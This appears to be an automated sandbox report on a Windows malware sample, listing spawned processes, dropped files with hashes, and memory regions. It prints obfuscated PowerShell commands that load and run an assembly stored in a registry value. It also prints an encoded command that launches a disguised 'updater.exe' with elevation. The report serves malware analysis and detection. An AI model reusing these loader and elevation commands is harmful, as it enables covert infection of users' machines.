C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b249759a-44d8-496f-a1f7-449dd254f48a}1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGUAcwBsACMAPgAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgADwAIwBxAGUAIwA+AA=="1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\ckj4gk4\imagestore.datFilesize
30KB
MD5b1e46e2fd4b63cfc83043512e068b716
SHA1c495e3d80ddf7048a28512112330a504a56370bd
SHA256da09858b5bf3ffdd6ad82cc95da3a3071937965c5fc246f7c2e68209b18fb835
SHA5122e75d4c0da75e0671ed22a94927bb03c302aaf1e69a0f296a20c1fe21289a44b1b3a6e4b42d24b8702115f22b5d779ddc412002dbd35f9e02dcfbe0be3abae8d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
C:\Users\Admin\Downloads\EdEYMrpFBNbTRHo.exeFilesize
4.5MB
MD5b7c12ce33a5c2de80bcd7083d839df6e
SHA16d2bce616fc00cafeb2ae4c5499305b36fcfb4f1
SHA25665970760831f083ce65c5ec185f5c1d1c73217bcf600de567f2960b592412c52
SHA512b3cbb1c781217aee343352f5ef2668fec9aa70a3f8ed39eafef88815bc4b5a858965d4ea9d30f86e04cdff4d22bef4447333027a56fbc02fc9708203e9987225
-
C:\Users\Admin\Downloads\EdEYMrpFBNbTRHo.exe.101k0uc.partialFilesize
4.5MB
MD5b7c12ce33a5c2de80bcd7083d839df6e
SHA16d2bce616fc00cafeb2ae4c5499305b36fcfb4f1
SHA25665970760831f083ce65c5ec185f5c1d1c73217bcf600de567f2960b592412c52
SHA512b3cbb1c781217aee343352f5ef2668fec9aa70a3f8ed39eafef88815bc4b5a858965d4ea9d30f86e04cdff4d22bef4447333027a56fbc02fc9708203e9987225
-
memory/328-204-0x00007FF96E950000-0x00007FF96E960000-memory.dmpFilesize
64KB
-
memory/376-158-0x0000000000000000-mapping.dmp
-
memory/588-202-0x00007FF96E950000-0x00007FF96E960000-memory.dmpFilesize
64KB
-
memory/676-203-0x00007FF96E950000-0x00007FF96E960000-memory.dmpFilesize
64KB
-
memory/832-145-0x0000000000000000-mapping.dmp
-
memory/1060-166-0x0000000000000000-mapping.dmp
-
memory/1360-153-0x0000000000000000-mapping.dmp
-
memory/1380-154-0x0000000000000000-mapping.dmp
-
memory/1752-164-0x0000000000000000-mapping.dmp
-
memory/2204-157-0x00007FF98F4D0000-0x00007FF98FF91000-memory.dmpFilesize
10.8MB
-
memory/2204-144-0x000000001C5F0000-0x000000001C602000-memory.dmpFilesize
72KB
-
memory/2204-137-0x00007FF98F4D0000-0x00007FF98FF91000-memory.dmpFilesize
10.8MB
-
memory/2204-136-0x00000000005D0000-0x0000000000A56000-memory.dmpFilesize
4.5MB
-
memory/2204-134-0x0000000000000000-mapping.dmp
-
memory/2256-167-0x0000000000000000-mapping.dmp
-
memory/2304-165-0x0000000000000000-mapping.dmp
-
memory/2508-178-0x0000000000000000-mapping.dmp
-
memory/2508-180-0x00007FF98F4D0000-0x00007FF98FF91000-memory.dmpFilesize
10.8MB
-
memory/2860-156-0x0000000000000000-mapping.dmp
-
memory/3108-141-0x00007FF98F4D0000-0x00007FF98FF91000-memory.dmpFilesize
10.8MB
-
memory/3108-140-0x00007FF98F4D0000-0x00007FF98FF91000-memory.dmpFilesize
10.8MB
-
memory/3108-139-0x000001EFF5D30000-0x000001EFF5D52000-memory.dmpFilesize
136KB
-
memory/3108-138-0x0000000000000000-mapping.dmp
-
memory/3344-150-0x0000000000000000-mapping.dmp
-
memory/3452-147-0x0000000000000000-mapping.dmp
-
memory/3524-152-0x0000000000000000-mapping.dmp
-
memory/3536-148-0x0000000000000000-mapping.dmp
-
memory/3580-160-0x0000000000000000-mapping.dmp
-
memory/3688-171-0x0000000000000000-mapping.dmp
-
memory/3696-146-0x0000000000000000-mapping.dmp
-
memory/3720-149-0x0000000000000000-mapping.dmp
-
memory/3792-187-0x0000000004680000-0x00000000046E6000-memory.dmpFilesize
408KB
-
memory/3792-201-0x0000000004C90000-0x0000000004CAE000-memory.dmpFilesize
120KB
-
memory/3792-186-0x0000000004610000-0x0000000004676000-memory.dmpFilesize
408KB
-
memory/3792-184-0x0000000003CE0000-0x0000000003D02000-memory.dmpFilesize
136KB
-
memory/3792-183-0x0000000003E70000-0x0000000004498000-memory.dmpFilesize
6.2MB
-
memory/3792-182-0x00000000036E0000-0x0000000003716000-memory.dmpFilesize
216KB
-
memory/3844-169-0x0000000000000000-mapping.dmp
-
memory/3896-159-0x0000000000000000-mapping.dmp
-
memory/4152-155-0x0000000000000000-mapping.dmp
-
memory/4156-197-0x00007FF9AE8D0000-0x00007FF9AEAC5000-memory.dmpFilesize
2.0MB
-
memory/4156-189-0x00007FF9ADC00000-0x00007FF9ADCBE000-memory.dmpFilesize
760KB
-
memory/4156-196-0x00007FF98F4D0000-0x00007FF98FF91000-memory.dmpFilesize
10.8MB
-
memory/4156-198-0x00007FF9ADC00000-0x00007FF9ADCBE000-memory.dmpFilesize
760KB
-
memory/4156-188-0x00007FF9AE8D0000-0x00007FF9AEAC5000-memory.dmpFilesize
2.0MB
-
memory/4156-185-0x00007FF98F4D0000-0x00007FF98FF91000-memory.dmpFilesize
10.8MB
-
memory/4260-143-0x0000000000000000-mapping.dmp
-
memory/4272-142-0x0000000000000000-mapping.dmp
-
memory/4304-163-0x0000000000000000-mapping.dmp
-
memory/4328-170-0x0000000000000000-mapping.dmp
-
memory/4632-161-0x0000000000000000-mapping.dmp
-
memory/4676-176-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/4676-173-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/4676-174-0x0000000140001844-mapping.dmp
-
memory/4676-175-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/4676-177-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/4784-172-0x0000000000000000-mapping.dmp
-
memory/4888-190-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/4888-195-0x00007FF9ADC00000-0x00007FF9ADCBE000-memory.dmpFilesize
760KB
-
memory/4888-194-0x00007FF9AE8D0000-0x00007FF9AEAC5000-memory.dmpFilesize
2.0MB
-
memory/4888-199-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/4888-193-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/4888-200-0x00007FF9AE8D0000-0x00007FF9AEAC5000-memory.dmpFilesize
2.0MB
-
memory/4888-192-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/4888-191-0x00000001400033F4-mapping.dmp
-
memory/4928-151-0x0000000000000000-mapping.dmp
-
memory/5028-162-0x0000000000000000-mapping.dmp
-
memory/5100-168-0x0000000000000000-mapping.dmp